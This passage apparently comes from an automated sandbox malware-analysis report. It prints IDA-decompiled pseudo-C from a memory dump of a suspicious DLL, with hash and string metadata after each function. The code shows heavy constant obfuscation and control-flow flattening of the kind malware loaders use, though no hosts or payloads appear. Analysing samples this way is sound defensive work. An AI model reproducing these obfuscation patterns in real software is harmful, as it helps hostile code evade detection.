                          				_t57 =  &_v1760; // 0x4b7b55
                          				_t504 = 0x6f;
                          				_v1760 =  *_t57 / _t504;
                          				_v1760 = _v1760 >> 0xb;
                          				_t505 = 0x66;
                          				_t564 = 6;
                          				_push("true");
                          				_v1760 = _v1760 * 0x46;
                          				_v1760 = _v1760 ^ 0x00015e15;
                          				_v1740 = 0xf42b27;
                          				_v1740 = _v1740 / _t505;
                          				_pop(_t506);
                          				_v1740 = _v1740 * 0x3b;
                          				_v1740 = _v1740 / _t564;
                          				_v1740 = _v1740 ^ 0x00118050;
                          				_v1680 = 0x69fb04;
                          				_v1680 = _v1680 / _t506;
                          				_v1680 = _v1680 + 0x2a45;
                          				_v1680 = _v1680 ^ 0x000477f2;
                          				_v1624 = 0xeefab1;
                          				_v1624 = _v1624 << 0xb;
                          				_v1624 = _v1624 ^ 0x77d908fd;
                          				_v1688 = 0x983026;
                          				_v1688 = _v1688 ^ 0xf9038374;
                          				_v1688 = _v1688 << 1;
                          				_v1688 = _v1688 ^ 0xf3384871;
                          				_v1656 = 0xbd9fd7;
                          				_v1656 = _v1656 | 0x34570662;
                          				_v1656 = _v1656 << 0xf;
                          				_v1656 = _v1656 ^ 0xcff19553;
                          				_v1724 = 0xb73e9;
                          				_v1724 = _v1724 + 0xffff2aba;
                          				_t507 = 0x1b;
                          				_v1724 = _v1724 * 0x2b;
                          				_v1724 = _v1724 + 0xffffc5c3;
                          				_v1724 = _v1724 ^ 0x01cec31d;
                          				_v1732 = 0xfb07a0;
                          				_v1732 = _v1732 + 0xfffff0a2;
                          				_v1732 = _v1732 ^ 0xe8e4881c;
                          				_v1732 = _v1732 + 0xfffffa8c;
                          				_v1732 = _v1732 ^ 0xe819b6c9;
                          				_v1664 = 0x98c4f6;
                          				_v1664 = _v1664 / _t507;
                          				_v1664 = _v1664 + 0xffffc9a9;
                          				_v1664 = _v1664 ^ 0x000722b9;
                          				_v1704 = 0x7b43f4;
                          				_v1704 = _v1704 + 0x33bf;
                          				_v1704 = _v1704 ^ 0xbdcd0236;
                          				_v1704 = _v1704 ^ 0xbdbcc173;
                          				_v1600 = 0x907d1c;
                          				_v1600 = _v1600 >> 0xa;
                          				_v1600 = _v1600 ^ 0x000f3001;
                          				_v1608 = 0x549b29;
                          				_v1608 = _v1608 + 0xffff560f;
                          				_v1608 = _v1608 ^ 0x005a0ce7;
                          				_v1648 = 0x53669a;
                          				_t508 = 0x60;
                          				_v1648 = _v1648 * 0x53;
                          				_v1648 = _v1648 * 0x2d;
                          				_v1648 = _v1648 ^ 0xc0c27601;
                          				_v1616 = 0xf6b3f;
                          				_v1616 = _v1616 << 0xf;
                          				_v1616 = _v1616 ^ 0xb591763f;
                          				_v1712 = 0xd11a2f;
                          				_v1712 = _v1712 >> 3;
                          				_v1712 = _v1712 + 0x34a7;
                          				_v1712 = _v1712 + 0xffffa6d8;
                          				_v1712 = _v1712 ^ 0x001715b5;
                          				_v1744 = 0x782a81;
                          				_v1744 = _v1744 >> 5;
                          				_v1744 = _v1744 >> 3;
                          				_v1744 = _v1744 * 0x57;
                          				_v1744 = _v1744 ^ 0x00239f7e;
                          				_v1728 = 0xdf27c0;
                          				_v1728 = _v1728 + 0xb655;
                          				_v1728 = _v1728 >> 0xf;
                          				_v1728 = _v1728 | 0x1084c50a;
                          				_v1728 = _v1728 ^ 0x10890bcf;
                          				_v1612 = 0xd31e5c;
                          				_v1612 = _v1612 / _t508;
                          				_v1612 = _v1612 ^ 0x000f28c0;
                          				_v1640 = 0xad59ab;
                          				_v1640 = _v1640 ^ 0x540bc483;
                          				_v1640 = _v1640 ^ 0x54aa6eab;
                          				_v1596 = 0xfc600e;
                          				_v1596 = _v1596 << 1;
                          				_v1596 = _v1596 ^ 0x01f16920;
                          				_v1676 = 0x70f7b6;
                          				_v1676 = _v1676 >> 1;
                          				_v1676 = _v1676 | 0x834faa8e;
                          				_v1676 = _v1676 ^ 0x837cfefc;
                          				_v1580 = 0xc67f49;
                          				_v1580 = _v1580 ^ 0x220388f4;
                          				_v1580 = _v1580 ^ 0x22cc2a29;
                          				_v1604 = 0xf53a42;
                          				_v1604 = _v1604 + 0x1d20;
                          				_v1604 = _v1604 ^ 0x00fba671;
                          				_v1764 = 0x3c20a1;
                          				_v1764 = _v1764 << 0xa;
                          				_v1764 = _v1764 | 0xcc5879dc;
                          				_v1764 = _v1764 + 0x7d87;
                          				_v1764 = _v1764 ^ 0xfcd01767;
                          				_v1736 = 0xfcd131;
                          				_v1736 = _v1736 | 0xb098ccc9;
                          				_v1736 = _v1736 + 0x1f04;
                          				_v1736 = _v1736 | 0xe0e1c446;
                          				_v1736 = _v1736 ^ 0xf0fbfa39;
                          				_v1684 = 0x6ca78a;
                          				_v1684 = _v1684 >> 0xd;
                          				_t509 = 0x5d;
                          				_v1684 = _v1684 / _t509;
                          				_v1684 = _v1684 ^ 0x00062aae;
                          				_v1576 = 0x28ea20;
                          				_t510 = 0x2d;
                          				_v1576 = _v1576 / _t510;
                          				_v1576 = _v1576 ^ 0x000e137d;
                          				_v1632 = 0x34444a;
                          				_v1632 = _v1632 + 0xb7da;
                          				_v1632 = _v1632 ^ 0x00330b1f;
                          				_v1748 = 0x707d69;
                          				_v1748 = _v1748 << 0xb;
                          				_v1748 = _v1748 ^ 0xb1536161;
                          				_v1748 = _v1748 + 0xffff04ff;
                          				_v1748 = _v1748 ^ 0x32b99598;
                          				_v1696 = 0x3e2d26;
                          				_v1696 = _v1696 + 0x9f8b;
                          				_v1696 = _v1696 + 0xf840;
                          				_v1696 = _v1696 ^ 0x00305f5f;
                          				_v1700 = 0x43ad40;
                          				_t511 = 0x7e;
                          				_v1700 = _v1700 / _t511;
                          				_v1700 = _v1700 + 0x17b0;
                          				_v1700 = _v1700 ^ 0x000023e6;
                          				_v1628 = 0x615af9;
                          				_v1628 = _v1628 | 0xc5f525fd;
                          				_v1628 = _v1628 ^ 0xc5f01915;
                          				_v1752 = 0xf7a5b1;
                          				_v1752 = _v1752 | 0xfe49737c;
                          				_v1752 = _v1752 + 0x9fc0;
                          				_v1752 = _v1752 ^ 0x9fa1c746;
                          				_v1752 = _v1752 ^ 0x60a54bb7;
                          				_v1572 = 0x7bbdbf;
                          				_t512 = 0xe;
                          				_v1572 = _v1572 * 0x2d;
                          				_v1572 = _v1572 ^ 0x15c0521a;
                          				_v1620 = 0xd84802;
                          				_v1620 = _v1620 ^ 0x3749a239;
                          				_v1620 = _v1620 ^ 0x37909643;
                          				_v1644 = 0xebc394;
                          				_v1644 = _v1644 << 8;
                          				_v1644 = _v1644 ^ 0xebca8902;
                          				_v1692 = 0x3d115c;
                          				_v1692 = _v1692 ^ 0xaeae6a77;
                          				_v1692 = _v1692 >> 0x10;
                          				_v1692 = _v1692 ^ 0x000f7307;
                          				_v1660 = 0x8a3dcc;
                          				_v1660 = _v1660 ^ 0x1263d9af;
                          				_v1660 = _v1660 / _t512;
                          				_v1660 = _v1660 ^ 0x015f4699;
                          				_v1592 = 0x64d88c;
                          				_v1592 = _v1592 ^ 0xc97cb881;
                          				_v1592 = _v1592 ^ 0xc91c2e76;
                          				_v1708 = 0x9c1e71;
                          				_v1708 = _v1708 ^ 0xd16e05af;
                          				_v1708 = _v1708 | 0x50445732;
                          				_v1708 = _v1708 << 5;
                          				_v1708 = _v1708 ^ 0x3ec99884;
                          				_v1716 = 0xd3e518;
                          				_v1716 = _v1716 + 0xffff72ee;
                          				_t501 = _v1568;
                          				_v1716 = _v1716 / _t564;
                          				_v1716 = _v1716 << 0xa;
                          				_v1716 = _v1716 ^ 0x8cea7ffc;
                          				while(1) {
                          					L1:
                          					_t513 = 0x5c;
                          					while(1) {
                          						L2:
                          						_t478 = 0x5243326;
                          						do {
                          							L3:
                          							if(_t562 == 0x22d4857) {
                          								_push(_v1688);
                          								_push(_v1624);
                          								_push(_v1680);
                          								_t479 = E00D4E1F8(0xd31030, _v1740, __eflags);
                          								E00D37078( &_v520, __eflags);
                          								_t482 =  *0xd56214; // 0x0
                          								_t486 =  *0xd56214; // 0x0
                          								__eflags = _t486 + 0x34;
                          								E00D3F96F(_v1656, _t486 + 0x34, _t486 + 0x34, _t479,  &_v520, _v1724,  &_v1560, _t482 + 0x23c, _v1732, _v1664, _v1704,  &_v1040);
                          								E00D4FECB(_t479, _v1600, _v1608, _v1648, _v1616);
                          								_t568 =  &(_t568[0x10]);
                          								_t562 = 0x6f5d8c5;
                          								goto L19;
                          							} else {
                          								if(_t562 == 0x3a11f46) {
                          									_push(_v1612);
                          									_push(_v1728);
                          									_push(_v1744);
                          									__eflags = E00D32DEA(_v1640,  &_v1564, _v1596, 0xd310a0, _v1756, _v1676, 0xd310a0, 0xd310a0, _v1580, _v1604, 0xd310a0, 0xd310a0, _v1652, _v1764, _v1736, _v1684, _v1576, E00D4E1F8(0xd310a0, _v1712, __eflags));
                          									_t562 =  ==  ? 0x5243326 : 0xbc3e7f;
                          									E00D4FECB(_t490, _v1632, _v1748, _v1696, _v1700);
                          									_t568 =  &(_t568[0x16]);
                          									L19:
                          									_t478 = 0x5243326;
                          									_t513 = 0x5c;
                          									goto L20;
                          								} else {
                          									if(_t562 == _t478) {
                          										_t494 = E00D400C5( &_v1560, _v1628, _v1752);
                          										_pop(_t522);
                          										_t497 = E00D42CD9(_v1572, _t501,  &_v1560, _t522, _v1564, _v1668, _v1620, 2 + _t494 * 2, _v1644, _v1692, _v1660);
                          										_t568 =  &(_t568[9]);
                          										__eflags = _t497;
                          										_t562 = 0xcd5a5d6;
                          										_v1568 = 0 | __eflags == 0x00000000;
                          										goto L1;
                          									} else {
                          										if(_t562 == 0x6f5d8c5) {
                          											_t502 =  *0xd56214; // 0x0
                          											_t503 = _t502 + 0x23c;
                          											while(1) {
                          												__eflags =  *_t503 - _t513;
                          												if(__eflags == 0) {
                          													break;
                          												}
                          												_t503 = _t503 + 2;
                          												__eflags = _t503;
                          											}
                          											_t501 = _t503 + 2;
                          											_t562 = 0x3a11f46;
                          											goto L2;
                          										} else {
                          											if(_t562 == 0xbc1c7ad) {
                          												E00D31A34(_v1584,  &_v1040, _t513, _t513, _v1672, _v1636, _v1720, _t513, _v1588, _v1760);
                          												_t568 =  &(_t568[8]);
                          												_t562 = 0x22d4857;
                          												while(1) {
                          													L1:
                          													_t513 = 0x5c;
                          													L2:
                          													_t478 = 0x5243326;
                          													goto L3;
                          												}
                          											} else {
                          												if(_t562 != 0xcd5a5d6) {
                          													goto L20;
                          												} else {
                          													E00D353D0(_v1592, _v1708, _v1716, _v1564);
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          							L10:
                          							return _v1568;
                          							L20:
                          							__eflags = _t562 - 0xbc3e7f;
                          						} while (__eflags != 0);
                          						goto L10;
                          					}
                          				}
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ($,.X$2WDP$E*$JD4$U{K$__0$i}p$#
                          • API String ID: 0-2449995950
                          • Opcode ID: f2d62348fc17554d1d0e7e7ab2542b5569efa3cda4d57ce5ec67805faddd0023
                          • Instruction ID: 48ced30e956fc26fa6a0777d1a86e88c200693c32305824e6f8697813c1a066c
                          • Opcode Fuzzy Hash: f2d62348fc17554d1d0e7e7ab2542b5569efa3cda4d57ce5ec67805faddd0023
                          • Instruction Fuzzy Hash: 7222207150C3809FD3A8CF64D98AA8BBBF2FBC4358F10891DE19996260D7B58949CF13
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E00D4E955() {
                          				char _v524;
                          				signed int _v532;
                          				intOrPtr _v536;
                          				intOrPtr _v540;
                          				intOrPtr _v544;
                          				intOrPtr _v548;
                          				intOrPtr _v552;
                          				intOrPtr _v556;
                          				intOrPtr _v560;
                          				char _v564;
                          				intOrPtr _v568;
                          				char _v572;
                          				signed int _v576;
                          				signed int _v580;
                          				signed int _v584;
                          				signed int _v588;
                          				signed int _v592;
                          				signed int _v596;
                          				signed int _v600;
                          				signed int _v604;
                          				signed int _v608;
                          				signed int _v612;
                          				signed int _v616;
                          				signed int _v620;
                          				signed int _v624;
                          				signed int _v628;
                          				signed int _v632;
                          				signed int _v636;
                          				signed int _v640;
                          				signed int _v644;
                          				signed int _v648;
                          				signed int _v652;
                          				signed int _v656;
                          				signed int _v660;
                          				signed int _v664;
                          				signed int _v668;
                          				signed int _v672;
                          				signed int _v676;
                          				signed int _v680;
                          				signed int _v684;
                          				signed int _v688;
                          				signed int _v692;
                          				signed int _v696;
                          				signed int _v700;
                          				signed int _v704;
                          				unsigned int _v708;
                          				signed int _t316;
                          				void* _t319;
                          				intOrPtr _t320;
                          				intOrPtr _t323;
                          				intOrPtr _t328;
                          				void* _t331;
                          				void* _t334;
                          				void* _t335;
                          				char _t342;
                          				signed int _t365;
                          				signed int _t366;
                          				signed int _t367;
                          				signed int _t368;
                          				signed int _t369;
                          				unsigned int* _t372;
                          
                          				_t372 =  &_v708;
                          				_v576 = 0xda0c08;
                          				_v576 = _v576 + 0xffff47d7;
                          				_t335 = 0x67615db;
                          				_v576 = _v576 ^ 0x00d953de;
                          				_v616 = 0x1aa62a;
                          				_v616 = _v616 ^ 0x887273cb;
                          				_v616 = _v616 ^ 0x8868d4e1;
                          				_v696 = 0x6cc5ff;
                          				_v696 = _v696 + 0xffff0f33;
                          				_v696 = _v696 + 0xffffebff;
                          				_v696 = _v696 + 0xffff9323;
                          				_v696 = _v696 ^ 0x006b5457;
                          				_v620 = 0xd441f6;
                          				_v620 = _v620 >> 2;
                          				_v620 = _v620 ^ 0x0035107d;
                          				_v668 = 0xe6e8c4;
                          				_v668 = _v668 + 0xffff0cc3;
                          				_v668 = _v668 | 0x11364c4e;
                          				_v668 = _v668 ^ 0x11fae4e7;
                          				_v664 = 0xedeede;
                          				_v664 = _v664 + 0x8dc4;
                          				_v664 = _v664 >> 0xb;
                          				_v664 = _v664 ^ 0x00096569;
                          				_v644 = 0x7bf23b;
                          				_v644 = _v644 + 0x7679;
                          				_v644 = _v644 << 2;
                          				_v644 = _v644 ^ 0x01f0e7c7;
                          				_v588 = 0xd55e4f;
                          				_v588 = _v588 >> 8;
                          				_v588 = _v588 ^ 0x000a9525;
                          				_v648 = 0x4b711e;
                          				_v648 = _v648 + 0xffff1f62;
                          				_v648 = _v648 ^ 0xa93f12d6;
                          				_v648 = _v648 ^ 0xa9763896;
                          				_v584 = 0xdb5f0a;
                          				_v584 = _v584 * 0x19;
                          				_t334 = 0;
                          				_v584 = _v584 ^ 0x156e4d85;
                          				_v608 = 0x3263c9;
                          				_v608 = _v608 + 0xe60;
                          				_v608 = _v608 ^ 0x0036f835;
                          				_v640 = 0x3b5ffd;
                          				_t365 = 0x46;
                          				_v640 = _v640 * 5;
                          				_v640 = _v640 / _t365;
                          				_v640 = _v640 ^ 0x000ce458;
                          				_v708 = 0xb95ed6;
                          				_t366 = 0x5a;
                          				_v708 = _v708 / _t366;
                          				_v708 = _v708 ^ 0x64dff63e;
                          				_v708 = _v708 >> 0x10;
                          				_v708 = _v708 ^ 0x000970e9;
                          				_v672 = 0xda5c0b;
                          				_v672 = _v672 >> 5;
                          				_v672 = _v672 * 0x6e;
                          				_v672 = _v672 ^ 0x02ed68c8;
                          				_v600 = 0xb0c206;
                          				_v600 = _v600 + 0x21e9;
                          				_v600 = _v600 ^ 0x00b07205;
                          				_v684 = 0x1b8021;
                          				_v684 = _v684 << 2;
                          				_v684 = _v684 >> 0xb;
                          				_v684 = _v684 << 8;
                          				_v684 = _v684 ^ 0x0007a69d;
                          				_v700 = 0x716346;
                          				_v700 = _v700 >> 0xe;
                          				_v700 = _v700 << 9;
                          				_v700 = _v700 | 0x54417142;
                          				_v700 = _v700 ^ 0x544d1ccb;
                          				_v704 = 0x83733f;
                          				_v704 = _v704 << 0xe;
                          				_v704 = _v704 << 1;
                          				_t367 = 0xf;
                          				_v704 = _v704 / _t367;
                          				_v704 = _v704 ^ 0x0c51ca4a;
                          				_v676 = 0x255e7;
                          				_v676 = _v676 ^ 0x45c0186f;
                          				_v676 = _v676 ^ 0x0e243a79;
                          				_v676 = _v676 ^ 0x4be8c079;
                          				_v652 = 0xc8a42f;
                          				_t368 = 0x3b;
                          				_v652 = _v652 * 0x1e;
                          				_v652 = _v652 + 0xffffdb98;
                          				_v652 = _v652 ^ 0x178e8932;
                          				_v660 = 0x399dd9;
                          				_v660 = _v660 << 0x10;
                          				_v660 = _v660 << 1;
                          				_v660 = _v660 ^ 0x3bb87d79;
                          				_v596 = 0x4a6152;
                          				_v596 = _v596 + 0xeb3a;
                          				_v596 = _v596 ^ 0x00451e15;
                          				_v604 = 0x1a296a;
                          				_v604 = _v604 >> 3;
                          				_v604 = _v604 ^ 0x000806f7;
                          				_v628 = 0x8a6a9a;
                          				_v628 = _v628 << 0xc;
                          				_v628 = _v628 / _t368;
                          				_v628 = _v628 ^ 0x02ddb0c3;
                          				_v612 = 0x56dff1;
                          				_v612 = _v612 << 4;
                          				_v612 = _v612 ^ 0x056559b2;
                          				_v592 = 0xb835f;
                          				_v592 = _v592 ^ 0x56373199;
                          				_v592 = _v592 ^ 0x563f1b5a;
                          				_v636 = 0x2555d1;
                          				_v636 = _v636 + 0xffff7c76;
                          				_v636 = _v636 | 0x931e680c;
                          				_v636 = _v636 ^ 0x933edc2a;
                          				_v688 = 0x729e7a;
                          				_v688 = _v688 + 0x52a9;
                          				_v688 = _v688 << 6;
                          				_v688 = _v688 ^ 0x08219d26;
                          				_v688 = _v688 ^ 0x149a839d;
                          				_v656 = 0xbb5b70;
                          				_v656 = _v656 + 0x6c7b;
                          				_v656 = _v656 | 0x24d7418a;
                          				_v656 = _v656 ^ 0x24f0c3f7;
                          				_v692 = 0xac0342;
                          				_v692 = _v692 + 0x6c81;
                          				_v692 = _v692 >> 0xd;
                          				_v692 = _v692 + 0xbde1;
                          				_v692 = _v692 ^ 0x00055202;
                          				_v632 = 0x18da0d;
                          				_t369 = 0x57;
                          				_v632 = _v632 * 0x5d;
                          				_v632 = _v632 + 0xffff6f25;
                          				_v632 = _v632 ^ 0x090e1c26;
                          				_v580 = 0xa5e89c;
                          				_v580 = _v580 / _t369;
                          				_v580 = _v580 ^ 0x000ce540;
                          				_v680 = 0x842c1c;
                          				_v680 = _v680 << 5;
                          				_v680 = _v680 ^ 0x259e7cb4;
                          				_v680 = _v680 + 0xffff46bd;
                          				_v680 = _v680 ^ 0x3515c03d;
                          				_v624 = 0x501187;
                          				_v624 = _v624 ^ 0x46ba0327;
                          				_v624 = _v624 ^ 0x46eeb458;
                          				_t364 = _v624;
                          				do {
                          					while(_t335 != 0x2d5e71a) {
                          						if(_t335 == 0x67615db) {
                          							_t335 = 0xf75ce9f;
                          							continue;
                          						} else {
                          							if(_t335 == 0x7a053ff) {
                          								E00D51538(_v680, _v624, _t364);
                          							} else {
                          								if(_t335 == 0x7a51f41) {
                          									_push(_v640);
                          									_push(_v608);
                          									_push(_v584);
                          									_t319 = E00D4E1F8(0xd31000, _v648, __eflags);
                          									_t320 =  *0xd56214; // 0x0
                          									_t323 =  *0xd56214; // 0x0
                          									E00D52D0A(_v672, __eflags, _t323 + 0x23c, _v600, _v684, _v700, 0xd31000,  &_v524, _t320 + 0x34, _t319);
                          									E00D4FECB(_t319, _v704, _v676, _v652, _v660);
                          									_t372 =  &(_t372[0xe]);
                          									_t335 = 0x2d5e71a;
                          									continue;
                          								} else {
                          									if(_t335 == 0xa48fbff) {
                          										_v572 = _v572 - E00D35477(_t335);
                          										_t335 = 0x7a51f41;
                          										asm("sbb [esp+0x9c], edx");
                          										continue;
                          									} else {
                          										if(_t335 == 0xd7f7f02) {
                          											_t328 = _v568;
                          											_t342 = _v572;
                          											_v560 = _t328;
                          											_v552 = _t328;
                          											_v544 = _t328;
                          											_v536 = _t328;
                          											_v532 = _v620;
                          											_v564 = _t342;
                          											_v556 = _t342;
                          											_v548 = _t342;
                          											_v540 = _t342;
                          											_t331 = E00D544FF(_v656, _v692, _t342, _v632, _t342, _v580,  &_v564, _t364);
                          											_t372 =  &(_t372[6]);
                          											__eflags = _t331;
                          											_t334 =  !=  ? 1 : _t334;
                          											_t335 = 0x7a053ff;
                          											continue;
                          										} else {
                          											if(_t335 != 0xf75ce9f) {
                          												goto L16;
                          											} else {
                          												E00D4CA1F(_v668, _v664,  &_v572, _v644, _v588);
                          												_t372 =  &(_t372[3]);
                          												_t335 = 0xa48fbff;
                          												continue;
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          						L19:
                          						return _t334;
                          					}
                          					_t316 = E00D545CA( &_v524, _v596, _t335, _t335, _v604, _v628, _v612, _v616, _v592, _v636, 0, _v688, _v696, _v576);
                          					_t364 = _t316;
                          					_t372 =  &(_t372[0xc]);
                          					__eflags = _t316 - 0xffffffff;
                          					if(__eflags == 0) {
                          						_t335 = 0xc46350e;
                          						goto L16;
                          					} else {
                          						_t335 = 0xd7f7f02;
                          						continue;
                          					}
                          					goto L19;
                          					L16:
                          					__eflags = _t335 - 0xc46350e;
                          				} while (__eflags != 0);
                          				goto L19;
                          			}


                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: :$BqAT$RaJ$WTk$ie$yv${l$!$p
                          • API String ID: 0-4263964199
                          • Opcode ID: 7b933cd420b88963264d3c1c4dbb99172763b0ad6ed974bbefacb24c7597762f
                          • Instruction ID: b71f9c83caf127213153b54d7ff94e268f1618351262da6e36b523571bb5c2ab
                          • Opcode Fuzzy Hash: 7b933cd420b88963264d3c1c4dbb99172763b0ad6ed974bbefacb24c7597762f
                          • Instruction Fuzzy Hash: 5CF13EB14093809FC3A8CF25C54AA5BFBE1FBC4758F10891DF2AA86260D7B18949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E00D536AA() {
                          				signed int _t373;
                          				signed int _t378;
                          				signed int _t379;
                          				signed int _t382;
                          				intOrPtr _t383;
                          				signed int _t385;
                          				signed int _t387;
                          				void* _t392;
                          				signed int _t435;
                          				signed int _t438;
                          				signed int _t439;
                          				signed int _t440;
                          				signed int _t441;
                          				signed int _t442;
                          				signed int _t443;
                          				signed int _t444;
                          				signed int _t445;
                          				signed int _t446;
                          				signed int _t447;
                          				signed int _t449;
                          				signed int* _t453;
                          
                          				 *_t453 = 0x507140;
                          				_t392 = 0xe12044f;
                          				_t453[4] =  *_t453 * 0x71;
                          				_t438 = 0x6b;
                          				_t453[5] = _t453[4] / _t438;
                          				_t453[5] = _t453[5] >> 9;
                          				_t453[5] = _t453[5] ^ 0x00002a7b;
                          				_t453[9] = 0x87b94d;
                          				_t453[9] = _t453[9] + 0xffff92a0;
                          				_t453[9] = _t453[9] + 0x79ac;
                          				_t453[9] = _t453[9] >> 3;
                          				_t453[9] = _t453[9] ^ 0x0010f8b2;
                          				_t453[0x18] = 0x43735f;
                          				_t453[0x18] = _t453[0x18] << 0xa;
                          				_t453[0x18] = _t453[0x18] + 0xffff408e;
                          				_t453[0x18] = _t453[0x18] ^ 0x0dccbc8d;
                          				_t453[0x19] = 0x2e99ff;
                          				_t439 = 0x48;
                          				_push("true");
                          				_t453[0x19] = _t453[0x19] / _t439;
                          				_t453[0x19] = _t453[0x19] | 0xc1c83132;
                          				_t453[0x19] = _t453[0x19] ^ 0xc1c60879;
                          				_t453[0xc] = 0xdcf188;
                          				_pop(_t440);
                          				_t453[0x2b] = _t453[0x2b] & 0x00000000;
                          				_t453[0xc] = _t453[0xc] * 0x48;
                          				_t453[0xc] = _t453[0xc] + 0xb8d0;
                          				_t453[0xc] = _t453[0xc] + 0xe79e;
                          				_t453[0xc] = _t453[0xc] ^ 0x3e220605;
                          				_t453[0x1f] = 0x3f10b8;
                          				_t453[0x1f] = _t453[0x1f] | 0x536a71f8;
                          				_t453[0x1f] = _t453[0x1f] ^ 0x537d907f;
                          				_t453[0x17] = 0xda4ece;
                          				_t453[0x17] = _t453[0x17] / _t440;
                          				_t453[0x17] = _t453[0x17] + 0xffff6c3f;
                          				_t453[0x17] = _t453[0x17] ^ 0x000916d6;
                          				_t453[0x21] = 0x81e16;
                          				_t441 = 0x1f;
                          				_t453[0x20] = _t453[0x21] * 0x37;
                          				_t453[0x20] = _t453[0x20] ^ 0x01bbd9e8;
                          				_t453[0x12] = 0x23ff7a;
                          				_t453[0x12] = _t453[0x12] + 0xda88;
                          				_t453[0x12] = _t453[0x12] << 9;
                          				_t453[0x12] = _t453[0x12] ^ 0x49b967a0;
                          				_t453[0x25] = 0xa4ae1d;
                          				_t453[0x25] = _t453[0x25] + 0xffff1e93;
                          				_t453[0x25] = _t453[0x25] ^ 0x00a3b794;
                          				_t453[0x1a] = 0xc58380;
                          				_t453[0x1a] = _t453[0x1a] + 0xffff63f4;
                          				_t453[0x1a] = _t453[0x1a] ^ 0x00c360dd;
                          				_t453[0xa] = 0x315c71;
                          				_t453[0xa] = _t453[0xa] * 0x2d;
                          				_t453[0xa] = _t453[0xa] << 4;
                          				_t453[0xa] = _t453[0xa] >> 9;
                          				_t453[0xa] = _t453[0xa] ^ 0x004c0641;
                          				_t453[0x26] = 0xfaa693;
                          				_t453[0x26] = _t453[0x26] / _t441;
                          				_t453[0x26] = _t453[0x26] ^ 0x0006da62;
                          				_t453[6] = 0x2e22d8;
                          				_t453[6] = _t453[6] + 0x1da5;
                          				_t453[6] = _t453[6] ^ 0x7a3436a8;
                          				_t453[6] = _t453[6] + 0x3380;
                          				_t453[6] = _t453[6] ^ 0x7a1ea83a;
                          				_t453[0xe] = 0x225cf9;
                          				_t442 = 0x46;
                          				_t453[0xf] = _t453[0xe] * 0xd;
                          				_t453[0xf] = _t453[0xf] / _t442;
                          				_t453[0xf] = _t453[0xf] ^ 0x000c9e58;
                          				_t453[0x1e] = 0xb4cd70;
                          				_t443 = 5;
                          				_t453[0x1e] = _t453[0x1e] / _t443;
                          				_t453[0x1e] = _t453[0x1e] ^ 0x00223e8b;
                          				_t453[0x25] = 0x175145;
                          				_t453[0x25] = _t453[0x25] + 0xffffbe60;
                          				_t453[0x25] = _t453[0x25] ^ 0x0015ea4b;
                          				_t453[0x16] = 0x9a90a6;
                          				_t453[0x16] = _t453[0x16] >> 1;
                          				_t453[0x16] = _t453[0x16] | 0x97e6917e;
                          				_t453[0x16] = _t453[0x16] ^ 0x97edbee9;
                          				_t453[0x14] = 0x10553c;
                          				_t453[0x14] = _t453[0x14] | 0x69ed7b68;
                          				_t453[0x14] = _t453[0x14] ^ 0x8ccf5101;
                          				_t453[0x14] = _t453[0x14] ^ 0xe532736d;
                          				_t453[0x12] = 0x5e103c;
                          				_t453[0x12] = _t453[0x12] ^ 0xd5bdf2ed;
                          				_t453[0x12] = _t453[0x12] | 0x536bb37e;
                          				_t453[0x12] = _t453[0x12] ^ 0xd7e39e3a;
                          				_t453[6] = 0xad714c;
                          				_t453[6] = _t453[6] << 5;
                          				_t444 = 0x5a;
                          				_t453[6] = _t453[6] * 0x77;
                          				_t453[6] = _t453[6] | 0x8fd7f967;
                          				_t453[6] = _t453[6] ^ 0x9ffa7b5b;
                          				_t453[0x29] = 0x969a62;
                          				_t453[0x29] = _t453[0x29] + 0xffff3747;
                          				_t453[0x29] = _t453[0x29] ^ 0x009bad24;
                          				_t453[0x22] = 0xa29aa2;
                          				_t453[0x22] = _t453[0x22] + 0xffff9bca;
                          				_t453[0x22] = _t453[0x22] ^ 0x00a8d7f4;
                          				_t453[0x28] = 0x5c718d;
                          				_t453[0x28] = _t453[0x28] / _t444;
                          				_t453[0x28] = _t453[0x28] ^ 0x000e04a7;
                          				_t453[0x15] = 0x6aed70;
                          				_t453[0x15] = _t453[0x15] | 0x24270adc;
                          				_t453[0x15] = _t453[0x15] ^ 0x00a30154;
                          				_t453[0x15] = _t453[0x15] ^ 0x24c5236d;
                          				_t453[0x20] = 0x9ad963;
                          				_t453[0x20] = _t453[0x20] ^ 0x804e7f4a;
                          				_t453[0x20] = _t453[0x20] ^ 0x80d9ea50;
                          				_t453[0x1c] = 0xc68496;
                          				_t453[0x1c] = _t453[0x1c] >> 0x10;
                          				_t453[0x1c] = _t453[0x1c] ^ 0x0003f168;
                          				_t453[0x24] = 0x7e4214;
                          				_t453[0x24] = _t453[0x24] << 4;
                          				_t453[0x24] = _t453[0x24] ^ 0x07e08805;
                          				_t453[0x11] = 0x92d404;
                          				_t445 = 0x3c;
                          				_t453[0x10] = _t453[0x11] / _t445;
                          				_t453[0x10] = _t453[0x10] + 0x2a76;
                          				_t453[0x10] = _t453[0x10] ^ 0x0004ebe7;
                          				_t453[9] = 0xe8ea05;
                          				_t453[9] = _t453[9] + 0xffffd5a4;
                          				_t453[9] = _t453[9] << 7;
                          				_t453[9] = _t453[9] + 0xffff1c2a;
                          				_t453[9] = _t453[9] ^ 0x7454948f;
                          				_t453[7] = 0x853308;
                          				_t453[7] = _t453[7] + 0xffff5128;
                          				_t453[7] = _t453[7] + 0x9f37;
